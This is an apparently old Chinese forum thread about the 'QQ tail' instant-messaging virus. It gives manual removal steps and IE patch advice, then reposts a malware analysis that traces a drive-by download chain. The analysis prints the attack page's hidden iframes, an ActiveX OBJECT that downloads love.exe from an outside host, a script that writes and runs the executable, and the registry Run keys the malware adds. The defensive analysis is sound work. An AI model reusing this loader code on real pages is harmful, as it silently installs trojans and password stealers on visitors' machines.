呵呵，最近局域网，被QQ病毒搞得苦不堪言，好像腾讯服务器也很受伤，就是QQ尾巴病毒。<br /><br /><br />近来的几种比较嚣张，能穿透还原精灵，主要是对Windows98而且IE没补丁的机器。<br /><br />简单的处理方法，还是老套路<br /><br /><span style='color:purple'>1</span>。进安全模式————开始——运行——msconfig——把想关QQ的启动项给去掉，像偶处理过的QQinfo.exe 以及sendmess.exe等等吧——暂时不要启动电脑<br /><span style='color:purple'>2</span>进系统盘要目录下，把windows 下的有关的QQinfo.exe 或sendmess.exe删除掉<br /><span style='color:purple'>3</span>开始——运行——regedit(进注册表）——查找QQinfo或sendmess找到一个删一个，直到查完注册表。重启电脑。OK吧~~<br /><br /><br />最好打上给IE打上HTA执行漏洞补丁: Q832894 和 Q822925,建议两个都打上,先Q822925再打Q832894<br />Q832894的官方下载地址  <br /><a href='http://www.microsoft.com/china/technet/asp/test/security/bulletin/MS04-004.asp' target='_blank'>http://www.microsoft.com/china/technet/asp...in/MS04-004.asp</a><br />Q822925的官方下载地址<br /><a href='http://www.microsoft.com/china/technet/security/bulletin/ms03-032.asp' target='_blank'>http://www.microsoft.com/china/technet/sec...in/ms03-032.asp</a>

转一篇分析文章<br /><br />剥光QQ病毒的外衣<br />作者：红色代码<br /><br /><span style='color:red'>注：本问所列所有网页均不要打开，否则后果自负！！</span><br /><br />   最近一段时间，QQ病毒十分猖獗，正想写点东西来介绍一下，没想到今天在网吧上网时，突然收到网友消息：我的相片..看看..http://nicex.4y.cn。根据经验判断，他的机子中了QQ病毒了，于是就拿这个东东开刀了，呵呵。先查了一下那个网页的源代码：view-source:http://nicex.4y.cn。切记，此处不可先打开网页再查看，那样必中无疑。找到可疑代码如下：<br /><br />&lt;a href=http://cylmir2.nease.net target=_blank&gt; <a href='http://cylmir2.nease.net' target='_blank'>http://cylmir2.nease.net</a> &lt;/a&gt;<br /><br />   果然够狠，在打开第一个网页的时候，上面这个可恶的网页也就被打开了。好，为了验证我的推测，顺藤摸瓜的找到病毒凶手，先查一下系统信息。运行msconfig，看了看各项的内容如下三张图：<br /><img src='http://www.54master.com/bbs/non-cgi/usr/21/21_7290_1.jpg' border='0' alt='user posted image' /><br /><img src='http://www.54master.com/bbs/non-cgi/usr/21/21_7290_3.jpg' border='0' alt='user posted image' /><br /><img src='http://www.54master.com/bbs/non-cgi/usr/21/21_7290_5.jpg' border='0' alt='user posted image' /><br /><br />好，查看一下这个隐含网页的源代码：view-source:http://cylmir2.nease.net。不查不知道，一查吓一条，我以最快的速度发现了以下两行敏感信息：<br /><br />&lt;iframe  src=&quot;1.htm&quot; width=&quot;0&quot; height=&quot;0&quot; frameborder=&quot;0&quot;&gt;&lt;/iframe&gt;<br />&lt;iframe  src=&quot;2.htm&quot; width=&quot;0&quot; height=&quot;0&quot; frameborder=&quot;0&quot;&gt;&lt;/iframe&gt;<br /><br />   最小化打开两个自动下载并执行病毒文件的网页1.htm和2.htm，狠！！此病毒的入口就在这里！！！<br /><br />   按照惯例，先查一下的源代码：view-source:http://cylmir2.nease.net/1.htm。敏感代码如下：<br /><br />codebase=&quot;http://cylmir2.nease.net/images/WebDownLoadProj1.ocx#version=1,0,0,0&quot;<br />&lt;param name=&quot;StrUrl&quot; value=&quot;http://cylmir2.nease.net/love.exe&quot;&gt;<br />&lt;/OBJECT&gt;<br />&lt;iframe src=&quot;love.mht&quot; width=&quot;0&quot; height=&quot;0&quot; frameborder=&quot;no&quot; border=&quot;0&quot; marginwidth=&quot;0&quot; marginheight=&quot;0&quot; scrolling=&quot;no&quot;&gt; &lt;/iframe&gt;<br /><br />   一旦这个网页被执行，后果就是IE自动下载以下三个文件：love.exe、love.mht和WebDownLoadProj1.ocx。后来我把那三个文件下到本地，用金山毒霸一查，呵呵，那个love.exe竟然是冰河！而那个love.mht却包含两种病毒，分别是Trojan.IframeExec和Win32.Trojan.Small.u，最后那个WebDownLoadProj1.ocx里面，就藏着大家所熟悉的QQ木马：Win32.Trojan.QQmsgNicex。呵呵，没想到，这个病毒搞的还比较神秘。<br /><br />   另一个2.htm的代码里面，发现了以下信息：<br /><br />&#60;script language=&quot;javs script&quot;&gt;<br />&#60;&#33;-- Begin<br />function opencolortext(){<br />window.open(&#39;3.htm&#39;,&#39;colortext&#39;,&#39;top=9999,left=9999,width=0,height=0&#39;)<br />}<br />setTimeout(&quot;opencolortext()&quot;,2000)<br />// End --&#62;<br />&lt;/script&gt;<br /><br />   晕，没想到还有个3.htm！！于是又查3.htm的代码：<br /><br />&#60;script language=javs script&gt; <br />run_exe=&quot;&lt;OBJECT ID=\&quot;RUNIT\&quot; WIDTH=0 HEIGHT=0 TYPE=\&quot;application/x-oleobject\&quot;&quot; <br />run_exe+=&quot;CODEBASE=\&quot;love.exe#version=1,1,1,1\&quot;&gt;&quot; <br />run_exe+=&quot;&lt;PARAM NAME=\&quot;_Version\&quot; value=\&quot;65536\&quot;&gt;&quot; <br />run_exe+=&quot;&lt;/OBJECT&gt;&quot; <br />run_exe+=&quot;&lt;HTML&gt;&lt;H1&gt; &lt;/H1&gt;&lt;/HTML&gt;&quot;; <br />document.open(); <br />document.clear(); <br />document.writeln(run_exe); <br />document.close(); <br />&lt;/SCRIPT&gt;<br /><br />   呵呵，相信到现在，仔细看了代码的朋友都知道了病毒文件是如何到本地并被执行的了吧？？IE就是这毛病，郁闷。<br /><br />   为了让大家进一步看清楚病毒感染后的效果，我特地在本地执行了love.exe（不要笑我变态哦，呵呵，网吧的机子，有还原精灵呢）。结果可想而知哦，发给别人的消息中也带了尾巴。发消息时，还没写完，就自动发出去了，而且重复发循环发。看来病毒程序已经驻留系统，监视当前窗口，一旦发现有QQ消息窗口，就开始行动了。于是查看系统信息，三张图如下：<br /><br /><img src='http://www.54master.com/bbs/non-cgi/usr/21/21_7290_2.jpg' border='0' alt='user posted image' /><br /><img src='http://www.54master.com/bbs/non-cgi/usr/21/21_7290_4.jpg' border='0' alt='user posted image' /><br /><img src='http://www.54master.com/bbs/non-cgi/usr/21/21_7290_6.jpg' border='0' alt='user posted image' /><br /><br /> 和刚开始的三张图比，有什么区别？启动项里被加了东西，Run后面被加了东西，Shell后面也被加了东西。这么做的效果就是，无论你是重新启动、注销后登陆、还是打开资源管理器时，都会自动执行病毒文件！！够狠。当然，系统里已经自动生成了以下几个病毒文件：DIRECTX.EXE、WINHELP32.EXE、WINHELP.EXE，而且这三个文件，图标竟然都是智能ABC的图标，很具有迷惑性（当然，它们的文件名也不例外哦）。<br /><br />   病毒修改注册表启动项如下：<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />run=&quot;WINhelp32.exe&quot; <br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<br />default=&quot;abchelp.exe&quot;<br /><br /><br />   另外，通过网络上的资料，得知病毒释放出来的木马，原来是偷“传奇”密码的。文件如下：INTRENAT.EXE、WinSocks.dll、SYSTEM.EXE。呵呵，有人问这些我是怎么知道的，其实很easy，只需要把执行病毒文件前后的系统文件按时间排列，看一下就知道了嘛。要是不放心，就拿金山杀一遍就ok了。<br /><br />  <br />   原来不可一世的QQ病毒就这样被剥的赤裸裸的摆在我面前了，如何处置就不废话了。先把病毒文件锁进大牢以备候审，然后杀毒！本来打算手工杀毒，但由于网吧用的98系统，机子没有结束进程的工具，删除不了正在运行的病毒程序，于是就找了一个QQ病毒的专杀，带毒查杀，速度奇快，准确率高，杀毒不影响工作，用了都说好，呵呵。<br /><br /><span style='color:red'>下载地址</span>  <a href='http://www.top86.com/iduba/download/tools/Duba_qqmsg.EXE' target='_blank'>http://www.top86.com/iduba/download/tools/Duba_qqmsg.EXE</a><br />结：最近一段时间，论坛里到处都是求救的帖子，一个QQ病毒就闹的如此疯狂，连腾讯的主页上都出现了其专杀工具的下载链接，我想这不能不引起大家的重视。毫无疑问，这都是由于个人安全意识不强造成的（当然不能否认IE的那个已被利用无数次的垃圾漏洞）。面对QQ上“别人发过来的照片”，广大网友应该擦亮自己的眼睛，明辩是非。另外，最近一段时间除了QQ病毒猖獗以外，MSN病毒也已经出现，IRC更是不用说了。可以大胆推断，病毒已经瞄上了即时聊天程序了，利用其特点来传播自己。从整个过程，我们可以看出，病毒和木马的界限已经越来越不明显，往往是互相合作、狼狈为奸。再回顾一下前一阵子的一些病毒，和黑客程序紧紧捆绑在一起，依靠网络为媒介疯狂传播，威力不可小视。病毒的发展已经逐渐呈现简单化、多极化、综合化、全面化了，这对反病毒工作是一个很大的考验。还有可怜的“传奇”，树大招风。最后，还是那句老话，对付病毒重在防患未然未雨绸缪，不是学会如何杀毒，而是知道如何防毒。

呵呵，这个很管用啊。。我老遇到有人中这个毒呢